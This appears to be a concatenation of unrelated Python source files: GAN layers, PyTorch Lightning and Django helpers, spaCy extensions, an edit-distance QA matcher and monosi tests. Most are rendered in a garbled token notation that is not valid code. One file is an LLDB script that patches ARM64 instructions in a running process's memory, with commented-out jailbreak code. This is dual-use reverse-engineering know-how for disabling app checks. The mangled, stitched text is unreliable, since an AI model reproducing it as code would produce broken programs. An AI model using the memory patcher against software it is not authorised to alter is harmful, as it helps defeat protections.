condition)<block_end>out=self.output_layer_bn(out)<line_sep>out=layers.relu(out)<line_sep>out=self.output_layer_conv(out)<line_sep><return>(layers.tanh(out)+1)/2<block_end><block_end><class_stmt>Discriminator(dg.Layer)<block_start><def_stmt>__init__ self n_class=1000 chn=96 blocks_with_attention="B2" resolution=256<block_start>super().__init__()<def_stmt>DBlock in_channel out_channel downsample=<true> use_attention=<false> skip_proj=<none><block_start><return>ResBlock(in_channel out_channel conditional=<false> upsample=<false> downsample=downsample use_attention=use_attention skip_proj=skip_proj)<block_end>self.chn=chn<line_sep>self.colors=3<line_sep>self.resolution=resolution<line_sep>self.blocks_with_attention=set(blocks_with_attention.split(","))<line_sep>self.blocks_with_attention.discard('')<line_sep>dblock=[]<line_sep>in_channels,out_channels=self.get_in_out_channels()<line_sep>self.sa_ids=[int(s.split('B')[-1])<for>s self.blocks_with_attention]<for_stmt>i,(nc_in nc_out) enumerate(zip(in_channels[:-1] out_channels[:-1]))<block_start>dblock.append(DBlock(nc_in nc_out downsample=<true> use_attention=(i+1)<in>self.sa_ids skip_proj=nc_in<eq>nc_out))<block_end>dblock.append(DBlock(in_channels[-1] out_channels[-1] downsample=<false> use_attention=len(out_channels)<in>self.sa_ids skip_proj=in_channels[-1]<eq>out_channels[-1]))<line_sep>self.blocks=dg.LayerList(dblock)<line_sep>self.final_fc=SpectralNorm(dg.Linear(16<times>chn 1))<line_sep>self.embed_y=dg.Embedding(size=[n_class 16<times>chn] is_sparse=<false> param_attr=Uniform(-0.1 0.1))<line_sep>self.embed_y=SpectralNorm(self.embed_y)<block_end><def_stmt>get_in_out_channels self<block_start>colors=self.colors<line_sep>resolution=self.resolution<if_stmt>resolution<eq>1024<block_start>channel_multipliers=[1 1 1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>512<block_start>channel_multipliers=[1 1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>256<block_start>channel_multipliers=[1 2 4 8 8 16 16]<block_end><elif_stmt>resolution<eq>128<block_start>channel_multipliers=[1 2 4 8 16 
16]<block_end><elif_stmt>resolution<eq>64<block_start>channel_multipliers=[2 4 8 16 16]<block_end><elif_stmt>resolution<eq>32<block_start>channel_multipliers=[2 2 2 2]<block_end><else_stmt><block_start><raise>ValueError("Unsupported resolution: {}".format(resolution))<block_end>out_channels=[self.chn<times>c<for>c channel_multipliers]<line_sep>in_channels=[colors]+out_channels[:-1]<line_sep><return>in_channels out_channels<block_end><def_stmt>forward self input class_id=<none><block_start>out=input<line_sep>features=[]<for_stmt>i,dblock enumerate(self.blocks)<block_start>out=dblock(out)<line_sep>features.append(out)<block_end>out=layers.relu(out)<line_sep>out=layers.reduce_sum(out [2 3])<line_sep>out_linear=self.final_fc(out)<if_stmt>class_id<is><none><block_start>prod=0<block_end><else_stmt><block_start>class_emb=self.embed_y(class_id)<line_sep>prod=layers.reduce_sum((class_emb<times>out) 1 keep_dim=<true>)<block_end><return>layers.sigmoid(out_linear+prod) features<block_end><block_end>
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
from typing import Callable, Optional


def is_param_in_hook_signature(hook_fx: Callable, param: str, explicit: bool = False, min_args: Optional[int] = None) -> bool:
    """
    Args:
        hook_fx: the hook callable
        param: the name of the parameter to check
        explicit: whether the parameter has to be explicitly declared
        min_args: whether the signature has at least ``min_args`` parameters
    """
    parameters = inspect.getfullargspec(hook_fx)
    args = parameters.args[1:]  # ignore `self`
    return (
        param in args
        or (not explicit and (parameters.varargs is not None))
        or (isinstance(min_args, int) and len(args) >= min_args)
    )
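A small illustration of how the check above behaves for a few hook signatures; the class and hook bodies are made up for the example.

class DummyModule:
    def training_step(self, batch, batch_idx):
        ...

    def validation_step(self, *args):
        ...


# An explicitly named parameter is found.
assert is_param_in_hook_signature(DummyModule.training_step, "batch_idx")
# `*args` counts as a match unless `explicit=True` is requested.
assert is_param_in_hook_signature(DummyModule.validation_step, "dataloader_idx")
assert not is_param_in_hook_signature(DummyModule.validation_step, "dataloader_idx", explicit=True)
# `min_args` matches on the number of positional parameters (excluding `self`).
assert is_param_in_hook_signature(DummyModule.training_step, "anything", min_args=2)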
""" catalogs//views.py """<import_from_stmt>django.http HttpResponse<import_from_stmt>catalogs.models Catalog<import_stmt>json<import_stmt>logging<line_sep>LOGGER=logging.getLogger('munkiwebadmin')<def_stmt>catalog_view request<block_start>'''Returns list of catalog names in JSON format'''<line_sep>catalog_list=Catalog.list()<line_sep>LOGGER.debug("Got request for catalog names")<line_sep><return>HttpResponse(json.dumps(catalog_list) content_type='application/json')<block_end><def_stmt>json_catalog_data request<block_start>'''Returns complied and sorted catalog data in JSON format'''<line_sep>LOGGER.debug("Got request for catalog data")<line_sep><return>HttpResponse(json.dumps(Catalog.catalog_info()) content_type='application/json')<block_end><def_stmt>get_pkg_ref_count request pkg_path<block_start>'''Returns the number of pkginfo files referencing a given pkg_path'''<line_sep>LOGGER.debug("Got request for pkg ref count for %s" pkg_path)<line_sep><return>HttpResponse(json.dumps(Catalog.get_pkg_ref_count(pkg_path)) content_type='application/json')<block_end>
"""Physical attributes of things. Right now, not much differs it from the constants module, but there will surely be much more to do with physics as time progresses. See Also: :mod:`constants` """<import_stmt>pygame<import_from_stmt>hypatia constants<class_stmt>Velocity(object)<block_start>"""Eight-directional velocity."""<def_stmt>__init__ self x=0 y=0<block_start>"""Speed in pixels per second per axis. Values may be negative. Args: x (int|None): -- y (int|None): -- """<line_sep>self.x=x<line_sep>self.y=y<block_end><block_end># this really isn't used, yet <class_stmt>Position(object)<block_start>"""The position of an object. Scaffolding. """<def_stmt>__init__ self x y size<block_start>"""Extrapolate position info from supplied info. Args: x (int|float): how many pixels from the left of the scene. y (int|float): how many pixels from the top of the scene. size (tuple): (x, y) pixel dimensions of object being represented. """<line_sep>self.rect=pygame.Rect((x y) size)<line_sep>self.float=(float(x) float(y))<line_sep>self.int=(x y)<block_end><block_end><class_stmt>AbsolutePosition(Position)<block_start>"""The absolute pixel coordinate in regard to the scene. Scaffolding. """<line_sep><pass><block_end>
"""Custom spaCy attributes for spaczz."""<import_from_future_stmt> annotations<import_from_stmt>typing Iterable Optional Set Tuple Type<import_stmt>warnings<import_from_stmt>spacy.tokens Doc Span Token<import_from_stmt>.exceptions AttrOverwriteWarning SpaczzSpanDeprecation<class_stmt>SpaczzAttrs<block_start>"""Adds spaczz custom attributes to spacy."""<line_sep>_initialized=<false><line_sep>@classmethod<def_stmt>initialize cls:Type[SpaczzAttrs]<arrow><none><block_start>"""Initializes and registers custom attributes."""<if_stmt><not>cls._initialized<block_start><try_stmt><block_start>Token.set_extension("spaczz_token" default=<false>)<line_sep>Token.set_extension("spaczz_type" default=<none>)<line_sep>Token.set_extension("spaczz_ratio" default=<none>)<line_sep>Token.set_extension("spaczz_counts" default=<none>)<line_sep>Token.set_extension("spaczz_details" default=<none>)<line_sep>Span.set_extension("spaczz_span" getter=cls.get_spaczz_span)<line_sep>Span.set_extension("spaczz_ent" getter=cls.get_spaczz_ent)<line_sep>Span.set_extension("spaczz_type" getter=cls.get_span_type)<line_sep>Span.set_extension("spaczz_types" getter=cls.get_span_types)<line_sep>Span.set_extension("spaczz_ratio" getter=cls.get_ratio)<line_sep>Span.set_extension("spaczz_counts" getter=cls.get_counts)<line_sep>Span.set_extension("spaczz_details" getter=cls.get_details)<line_sep>Doc.set_extension("spaczz_doc" getter=cls.get_spaczz_doc)<line_sep>Doc.set_extension("spaczz_types" getter=cls.get_doc_types)<line_sep>cls._initialized=<true><block_end><except_stmt>ValueError<block_start>warnings.warn("""One or more spaczz custom extensions has already been registered. These are being force overwritten. Please avoid defining personal, custom extensions prepended with "spaczz_". """ AttrOverwriteWarning )<line_sep>Token.set_extension("spaczz_token" default=<false> force=<true>)<line_sep>Token.set_extension("spaczz_type" default=<none> force=<true>)<line_sep>Token.set_extension("spaczz_ratio" default=<none> force=<true>)<line_sep>Token.set_extension("spaczz_counts" default=<none> force=<true>)<line_sep>Span.set_extension("spaczz_span" getter=cls.get_spaczz_span force=<true>)<line_sep>Span.set_extension("spaczz_type" getter=cls.get_span_type force=<true>)<line_sep>Span.set_extension("spaczz_types" getter=cls.get_span_types force=<true>)<line_sep>Span.set_extension("spaczz_ratio" getter=cls.get_ratio force=<true>)<line_sep>Span.set_extension("spaczz_counts" getter=cls.get_counts force=<true>)<line_sep>Doc.set_extension("spaczz_doc" getter=cls.get_spaczz_doc force=<true>)<line_sep>Doc.set_extension("spaczz_types" getter=cls.get_doc_types force=<true>)<block_end><block_end><block_end>@staticmethod<def_stmt>get_spaczz_span span:Span<arrow>bool<block_start>"""Getter for spaczz_span `Span` attribute."""<line_sep>warnings.warn("""spaczz_span is deprecated. 
Use spaczz_ent instead.""" SpaczzSpanDeprecation )<line_sep><return>all([token._.spaczz_token<for>token span])<block_end>@staticmethod<def_stmt>get_spaczz_ent span:Span<arrow>bool<block_start>"""Getter for spaczz_ent `Span` attribute."""<line_sep><return>all([token._.spaczz_token<for>token span])<block_end>@classmethod<def_stmt>get_span_type cls:Type[SpaczzAttrs] span:Span<arrow>Optional[str]<block_start>"""Getter for spaczz_type `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_type<for>token span])<block_start><return>span[0]._.spaczz_type<block_end><else_stmt><block_start><return><none><block_end><block_end>@staticmethod<def_stmt>get_span_types span:Span<arrow>Set[str]<block_start>"""Getter for spaczz_types `Span` attribute."""<line_sep>types=[token._.spaczz_type<for>token span<if>token._.spaczz_type]<line_sep><return>set(types)<block_end>@classmethod<def_stmt>get_ratio cls:Type[SpaczzAttrs] span:Span<arrow>Optional[int]<block_start>"""Getter for spaczz_ratio `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_ratio<for>token span])<block_start><return>span[0]._.spaczz_ratio<block_end><else_stmt><block_start><return><none><block_end><block_end>@classmethod<def_stmt>get_counts cls:Type[SpaczzAttrs] span:Span<arrow>Optional[Tuple[int int int]]<block_start>"""Getter for spaczz_counts `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_counts<for>token span])<block_start><return>span[0]._.spaczz_counts<block_end><else_stmt><block_start><return><none><block_end><block_end>@classmethod<def_stmt>get_details cls:Type[SpaczzAttrs] span:Span<arrow>Optional[int]<block_start>"""Getter for current placeholder spaczz_details `Span` attribute."""<if_stmt>cls._all_equal([token._.spaczz_details<for>token span])<block_start><return>span[0]._.spaczz_details<block_end><else_stmt><block_start><return><none><block_end><block_end>@staticmethod<def_stmt>get_spaczz_doc doc:Doc<arrow>bool<block_start>"""Getter for spaczz_doc `Doc` attribute."""<line_sep><return>any([token._.spaczz_token<for>token doc])<block_end>@staticmethod<def_stmt>get_doc_types doc:Doc<arrow>Set[str]<block_start>"""Getter for spaczz_types `Doc` attribute."""<line_sep>types=[token._.spaczz_type<for>token doc<if>token._.spaczz_type]<line_sep><return>set(types)<block_end>@staticmethod<def_stmt>_all_equal iterable:Iterable<arrow>bool<block_start>"""Tests if all elements of iterable are equal."""<line_sep>iterator=iter(iterable)<try_stmt><block_start>first=next(iterator)<block_end><except_stmt>StopIteration<block_start><return><true><block_end><return>all(first<eq>rest<for>rest iterator)<block_end><block_end>
import sys
import os

from scipy import spatial
import numpy as np


def editDistance(str1, str2, m, n):
    # edit distance, dynamic-programming implementation; m = len(str1) and n = len(str2)
    dp = [[0 for x in range(n + 1)] for x in range(m + 1)]
    for i in range(m + 1):
        for j in range(n + 1):
            if i == 0:
                dp[i][j] = j  # Min. operations = j
            elif j == 0:
                dp[i][j] = i  # Min. operations = i
            elif str1[i - 1] == str2[j - 1]:
                dp[i][j] = dp[i - 1][j - 1]
            else:
                dp[i][j] = 1 + min(dp[i][j - 1],      # Insert
                                   dp[i - 1][j],      # Remove
                                   dp[i - 1][j - 1])  # Replace
    return dp[m][n]


def concatenateString(paragraph, start, length):
    final_string = paragraph[start]
    for i in range(1, length):
        final_string += " " + paragraph[start + i]
    return final_string


def find_answer(paragraph, answer):
    # check if the answer is already in the paragraph
    correct_answer = ""
    score_answer = 1000000
    para_words = paragraph.split()
    for i in range(0, len(para_words)):
        # check max 15-word ranges, reduced for efficiency
        for j in range(1, min(15, len(para_words) - i + 1)):
            candidate = concatenateString(para_words, i, j)
            if candidate == answer:
                return answer, paragraph.find(answer)
            score = editDistance(answer, candidate, len(answer), len(candidate))
            if score < score_answer:
                score_answer = score
                correct_answer = candidate
    return correct_answer, paragraph.find(correct_answer)


def test_find_answer():
    p = "أصبحت بلاكبول وبلاكبيرن مع داروين سلطات وحدوية مستقلة "
    a = "بلاكبو"
    print(find_answer(p, a))
def get_all_includes(comp_args, dst_includes):
    # Collect -I, -isystem and -include flags from a compiler argument list into dst_includes.
    i = 0
    while i < len(comp_args):
        curr_arg = comp_args[i].strip()
        if curr_arg == "-isystem":
            curr_arg1 = "-I" + comp_args[i + 1].strip()
            if curr_arg1 not in dst_includes:
                dst_includes.append(curr_arg1)
        if curr_arg == "-include":
            curr_arg1 = comp_args[i + 1].strip()
            if "dhd_sec_feature.h" not in curr_arg1:
                final_arg = curr_arg + " " + curr_arg1
                if final_arg not in dst_includes:
                    dst_includes.append(final_arg)
        if curr_arg[0:2] == "-I":
            if curr_arg not in dst_includes:
                if 'drivers' not in curr_arg and 'sound' not in curr_arg:
                    dst_includes.append(curr_arg)
        i += 1
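A quick sketch of how the extractor above might be driven; the compile command is invented for illustration.

# Collect -I/-isystem/-include flags from a made-up compile command.
compile_args = [
    "gcc", "-c", "-Iinclude", "-isystem", "/usr/lib/gcc/include",
    "-include", "config.h", "-Idrivers/net", "-o", "foo.o", "foo.c",
]

includes = []
get_all_includes(compile_args, includes)
print(includes)
# Expected under these assumptions (the drivers/ path is filtered out):
# ['-Iinclude', '-I/usr/lib/gcc/include', '-include config.h']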
<import_stmt>sys<line_sep>""" This module handles import compatibility issues between Python 2 and Python 3. """<line_sep># Syntax sugar. _ver=sys.version_info<line_sep>#: Python 2.x? is_py2=(_ver[0]<eq>2)<line_sep>#: Python 3.x? is_py3=(_ver[0]<eq>3)<if_stmt>is_py2<block_start>builtin_str=str<line_sep>bytes=str<line_sep>str=unicode<line_sep>basestring=basestring<line_sep>numeric_types=(int long float)<block_end><elif_stmt>is_py3<block_start>builtin_str=str<line_sep>str=str<line_sep>bytes=bytes<line_sep>basestring=(str bytes)<line_sep>numeric_types=(int float)<block_end>
#! /usr/bin/env python3 # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| # _ ___ _ _ _____ ____ # (_) / _ \| | | | | __ \| _ \ # __ ___ __ _| | | | | | | | | | | |_) | # \ \/ / |/ _` | | | | | | | | | | | _ < # > <| | (_| | |_| | |____| |____| |__| | |_) | # /_/\_\_|\__,_|\___/|______|______|_____/|____/ # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| <import_stmt>lldb<import_stmt>os<import_stmt>shlex<import_stmt>optparse<import_stmt>json<import_stmt>re<import_stmt>utils<def_stmt>__lldb_init_module debugger internal_dict<block_start>debugger.HandleCommand('command script add -f patcher.handle_command patcher -h "patch code in lldb"')<line_sep># print('========') # print('[patcher]: patch code in lldb') # print('\tpatcher -a patch_addr -i instrument -s instrument_count') # print('\tmore usage, try "patcher -h"') <block_end><def_stmt>handle_command debugger command exe_ctx result internal_dict<block_start>command_args=shlex.split(command posix=<false>)<line_sep>parser=generate_option_parser()<try_stmt><block_start>(options _)=parser.parse_args(command_args)<block_end><except_stmt><block_start>result.SetError(parser.usage)<line_sep><return><block_end>_=exe_ctx.target<line_sep>_=exe_ctx.thread<if_stmt>options.patchInstrument<block_start><if_stmt>options.patchAddress<block_start>patch_addr=int(options.patchAddress 16)<block_end><else_stmt><block_start>ret=utils.exe_cmd(debugger "p/x $pc")<line_sep>ret=ret.strip()<line_sep>pattern='0x[0-9a-f]+'<line_sep>match=re.search(pattern ret)<if_stmt>match<block_start>found=match.group(0)<block_end><else_stmt><block_start>utils.ELOG("not get address:"+ret)<line_sep><return><block_end>utils.ILOG("you not set patch address, default is current pc address:{}".format(found))<line_sep>patch_addr=int(found 16)<block_end>patch_ins=options.patchInstrument<line_sep># default instrument size is 1 patch_size=0x1<line_sep>patch_ins=patch_ins.replace("\"" "")<line_sep>patch_ins=patch_ins.replace("'" "")<if_stmt>options.patchSize<block_start>patch_size=int(options.patchSize)<block_end>ret=patcher(debugger patch_ins patch_addr patch_size)<line_sep>result.AppendMessage(str(ret))<block_end><else_stmt><block_start>result.AppendMessage("[-] args error, check it !")<block_end><return><block_end><def_stmt>patch_code debugger addr ins count<block_start>command_script='@import Foundation;\n'<line_sep>command_script<augadd>'uint64_t x_addr = {};\n'.format(addr)<line_sep>command_script<augadd>'uint8_t patch_data[] = {};\n'.format(ins)<line_sep>command_script<augadd>'int insCount = {};\n'.format(count)<line_sep>command_script<augadd>r''' NSMutableString* retStr = [NSMutableString string]; void * patch_addr = (void*)x_addr; //uint8_t patch_data[] = {0xc0, 0x03, 0x5f, 0xd6}; int patch_data_size = 4*insCount; // =====================================================patch code============================================= typedef bool (*patch_code_t)(void* patch_addr, uint8_t* patch_data, int patch_data_size); patch_code_t patch_code = [](void* patch_addr, uint8_t* patch_data, int patch_data_size) -> bool { #define PAGE_SIZE 0x0000000000004000 #define PAGE_MASK 0x0000000000003fff #define RTLD_LAZY 0x1 
#define RTLD_NOW 0x2 #define RTLD_LOCAL 0x4 #define RTLD_GLOBAL 0x8 #define VM_PROT_READ ((vm_prot_t) 0x01) #define VM_PROT_WRITE ((vm_prot_t) 0x02) #define VM_PROT_EXECUTE ((vm_prot_t) 0x04) #define PROT_NONE 0x00 /* [MC2] no permissions */ #define PROT_READ 0x01 /* [MC2] pages can be read */ #define PROT_WRITE 0x02 /* [MC2] pages can be written */ #define PROT_EXEC 0x04 /* [MC2] pages can be executed */ #define MAP_SHARED 0x0001 #define MAP_ANON 0x1000 #define KERN_SUCCESS 0 typedef unsigned int mach_port_t; typedef int kern_return_t; typedef unsigned int vm_inherit_t; typedef mach_port_t task_t; typedef int vm_prot_t; typedef unsigned long uintptr_t; typedef uintptr_t vm_offset_t; typedef vm_offset_t vm_address_t; typedef uint64_t mach_vm_address_t; typedef int boolean_t; typedef int vm_behavior_t; typedef uint32_t vm32_object_id_t; typedef uintptr_t vm_size_t; typedef int *vm_region_recurse_info_t; typedef unsigned long long memory_object_offset_t; struct vm_region_submap_short_info_64 { vm_prot_t protection; /* present access protection */ vm_prot_t max_protection; /* max avail through vm_prot */ vm_inherit_t inheritance;/* behavior of map/obj on fork */ memory_object_offset_t offset; /* offset into object/map */ unsigned int user_tag; /* user tag on map entry */ unsigned int ref_count; /* obj/map mappers, etc */ unsigned short shadow_depth; /* only for obj */ unsigned char external_pager; /* only for obj */ unsigned char share_mode; /* see enumeration */ boolean_t is_submap; /* submap vs obj */ vm_behavior_t behavior; /* access behavior hint */ vm32_object_id_t object_id; /* obj/map name, not a handle */ unsigned short user_wired_count; }; typedef unsigned int __darwin_natural_t; typedef __darwin_natural_t natural_t; typedef natural_t mach_msg_type_number_t; typedef struct vm_region_submap_short_info_64 vm_region_submap_short_info_data_64_t; #define VM_REGION_SUBMAP_SHORT_INFO_COUNT_64 \ ((mach_msg_type_number_t) \ (sizeof (vm_region_submap_short_info_data_64_t) / sizeof (natural_t))) #define VM_FLAGS_OVERWRITE 0x4000 /* delete any existing mappings first */ typedef int __int32_t; typedef __int32_t __darwin_pid_t; typedef __darwin_pid_t pid_t; // init value kern_return_t kret; task_t self_task = (task_t)mach_task_self(); /* Set platform binary flag */ #define FLAG_PLATFORMIZE (1 << 1) // platformize_me // https://github.com/pwn20wndstuff/Undecimus/issues/112 /* void* handle = (void*)dlopen("/usr/lib/libjailbreak.dylib", RTLD_LAZY); if (!handle){ //[retStr appendString:@"[-] /usr/lib/libjailbreak.dylib dlopen failed!\n"]; return false; } // Reset errors (const char *)dlerror(); typedef void (*fix_entitle_prt_t)(pid_t pid, uint32_t what); fix_entitle_prt_t ptr = (fix_entitle_prt_t)dlsym(handle, "jb_oneshot_entitle_now"); const char *dlsym_error = (const char *)dlerror(); if (dlsym_error) return; ptr((pid_t)getpid(), FLAG_PLATFORMIZE); //[retStr appendString:@"\n[+] platformize me success!"]; */ void* target_addr = patch_addr; // 1. 
get target address page and patch offset unsigned long page_start = (unsigned long) (target_addr) & ~PAGE_MASK; unsigned long patch_offset = (unsigned long)target_addr - page_start; // map new page for patch void *new_page = (void *)mmap(NULL, PAGE_SIZE, 0x1 | 0x2, 0x1000 | 0x0001, -1, 0); if (!new_page ){ //[retStr appendString:@"[-] mmap failed!\n"]; return false; } kret = (kern_return_t)vm_copy(self_task, (unsigned long)page_start, PAGE_SIZE, (vm_address_t) new_page); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] vm_copy faild!\n"]; return false; } // 4. start patch /* nop -> {0x1f, 0x20, 0x03, 0xd5} ret -> {0xc0, 0x03, 0x5f, 0xd6} */ // char patch_ins_data[4] = {0x1f, 0x20, 0x03, 0xd5}; // mach_vm_write(task_self, (vm_address_t)(new+patch_offset), patch_ret_ins_data, 4); memcpy((void *)((uint64_t)new_page+patch_offset), patch_data, patch_data_size); //[retStr appendString:@"[+] patch ret[0xc0 0x03 0x5f 0xd6] with memcpy\n"]; // set back to r-x (int)mprotect(new_page, PAGE_SIZE, PROT_READ | PROT_EXEC); //[retStr appendString:@"[*] set new page back to r-x success!\n"]; // remap vm_prot_t prot; vm_inherit_t inherit; // get page info vm_address_t region = (vm_address_t) page_start; vm_size_t region_len = 0; struct vm_region_submap_short_info_64 vm_info; mach_msg_type_number_t info_count = VM_REGION_SUBMAP_SHORT_INFO_COUNT_64; natural_t max_depth = 99999; kret = (kern_return_t)vm_region_recurse_64(self_task, &region, &region_len, &max_depth, (vm_region_recurse_info_t) &vm_info, &info_count); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] vm_region_recurse_64 faild!\n"]; return false; } prot = vm_info.protection & (PROT_READ | PROT_WRITE | PROT_EXEC); inherit = vm_info.inheritance; //[retStr appendString:@"[*] get page info done.\n"]; vm_prot_t c; vm_prot_t m; mach_vm_address_t target = (mach_vm_address_t)page_start; kret = (kern_return_t)mach_vm_remap(self_task, &target, PAGE_SIZE, 0, VM_FLAGS_OVERWRITE, self_task, (mach_vm_address_t) new_page, true, &c, &m, inherit); if (kret != KERN_SUCCESS){ //[retStr appendString:@"[-] remap mach_vm_remap faild!\n"]; return false; } //[retStr appendString:@"[+] remap to target success!\n"]; // clear cache void* clear_start_ = (void*)(page_start + patch_offset); sys_icache_invalidate (clear_start_, 4); sys_dcache_flush (clear_start_, 4); return true; }; // =====================================================patch code============================================= patch_code(patch_addr, patch_data, patch_data_size); [retStr appendString:@"patch done."]; retStr '''<line_sep>retStr=utils.exe_script(debugger command_script)<line_sep><return>utils.hex_int_in_str(retStr)<block_end><def_stmt>is_raw_data data# pylint: disable=anomalous-backslash-in-string <block_start>pattern="\{\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*,\s*0x[0-9a-fA-F]{2}\s*\}"<line_sep>ret=re.match(pattern data)<if_stmt><not>ret<block_start><return><false><block_end><return><true><block_end><def_stmt>patcher debugger ins addr size<block_start><if_stmt>is_raw_data(ins)<block_start>utils.ILOG("detect you manual set ins data:{}".format(ins))<line_sep>utils.ILOG("start patch text at address:{} size:{} to ins data:{}".format(hex(addr) size ins))<line_sep>patch_code(debugger hex(addr) ins size)<line_sep><return>"[x] power by xia0@2019"<block_end>supportInsList={'nop':'0x1f, 0x20, 0x03, 0xd5 ' 'ret':'0xc0, 0x03, 0x5f, 0xd6' 'mov0':'0x00, 0x00, 0x80, 0xd2' 'mov1':'0x20, 0x00, 0x80, 
0xd2'}<if_stmt>ins<not><in>supportInsList.keys()<block_start>utils.ELOG("patcher not support this ins type:{}".format(ins))<line_sep><return>"[x] power by xia0@2019"<block_end>utils.ILOG("start patch text at address:{} size:{} to ins:\"{}\" and data:{}".format(hex(addr) size ins supportInsList[ins]))<line_sep># for i in range(size): # patch_code(debugger, hex(curPatchAddr), supportInsList[ins]) # utils.SLOG("current patch address:{} patch done".format(hex(curPatchAddr))) # curPatchAddr += 4 ins_data=""<for_stmt>i range(size)<block_start>ins_data<augadd>supportInsList[ins]<if_stmt>i<ne>size-1<block_start>ins_data<augadd>","<block_end><block_end>build_ins_data="{"+ins_data+"}"<line_sep>utils.ILOG("make ins data:\n{}".format(build_ins_data))<line_sep>patch_code(debugger hex(addr) build_ins_data size)<line_sep>utils.SLOG("patch done")<line_sep><return>"[x] power by xia0@2019"<block_end><def_stmt>generate_option_parser <block_start>usage="patcher"<line_sep>parser=optparse.OptionParser(usage=usage prog="lookup")<line_sep>parser.add_option("-a" "--address" action="store" default=<none> dest='patchAddress' help="need patch code address")<line_sep>parser.add_option("-i" "--instrument" action="store" default=<none> dest='patchInstrument' help="patch instrument type")<line_sep>parser.add_option("-s" "--size" action="store" default=<none> dest='patchSize' help="patch instrument count")<line_sep><return>parser<block_end>
<import_stmt>pytest<import_stmt>ingestion.transformers.monosi.monitors<as>monitors<line_sep>@pytest.fixture<def_stmt>schema <block_start><return>{'columns':['NAME' 'COL_NAME' 'COL_TYPE' 'COL_DESCRIPTION' 'COL_SORT_ORDER' 'DATABASE' 'SCHEMA' 'DESCRIPTION' 'IS_VIEW'] 'rows':[{'NAME':'name_of_table' 'COL_NAME':'name_of_col' 'COL_TYPE':'timestamp_tz' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} {'NAME':'name_of_table' 'COL_NAME':'name_of_col_2' 'COL_TYPE':'text' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} {'NAME':'name_of_table_2' 'COL_NAME':'name_of_col_3' 'COL_TYPE':'int' 'COL_DESCRIPTION':<none> 'COL_SORT_ORDER':'3' 'DATABASE':'database' 'SCHEMA':'schema' 'DESCRIPTION':<none> 'IS_VIEW':'false'} ]}<block_end><def_stmt>test__transform_empty <block_start>input_arr={'rows':[]}<line_sep>output_arr=monitors.MonitorTransformer._transform(input_arr)<assert_stmt>len(output_arr)<eq>0<block_end><def_stmt>test__transform schema<block_start>output_arr=monitors.MonitorTransformer._transform(schema)<line_sep>expected_num_monitors=2<assert_stmt>len(output_arr)<eq>expected_num_monitors<block_end>@pytest.fixture<def_stmt>monitor <block_start><return>{}<block_end>@pytest.fixture<def_stmt>normalized_schema <block_start><return>monitors.MonitorTransformer._normalized_schema()<block_end><def_stmt>test__normalized_schema_correct normalized_schema monitor<block_start>input_arr=[monitor]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__normalized_schema_correct_multiple normalized_schema monitor<block_start>input_arr=[monitor monitor]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__normalized_schema_incorrect_to_have_none normalized_schema<block_start>input_arr=[]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__normalized_schema_incorrect normalized_schema<block_start>input_arr=[{"anything":"goeshere"}]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__normalized_schema_incorrect_multiple normalized_schema<block_start>input_arr=[{} {"anything":"goeshere"}]<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr normalized_schema)<assert_stmt>is_correct<eq><false><block_end>@pytest.fixture<def_stmt>original_schema <block_start><return>monitors.MonitorTransformer._original_schema()<block_end><def_stmt>test__original_schema_correct original_schema schema<block_start>is_correct=monitors.MonitorTransformer.match(schema original_schema)<assert_stmt>is_correct<eq><true><block_end><def_stmt>test__original_schema_incorrect_to_have_none original_schema<block_start>is_correct=monitors.MonitorTransformer.match({} original_schema)<assert_stmt>is_correct<eq><false><block_end><def_stmt>test__original_schema_incorrect original_schema<block_start>input_arr={'anything':'goeshere'}<line_sep>is_correct=monitors.MonitorTransformer.match(input_arr original_schema)<assert_stmt>is_correct<eq><false><block_end>
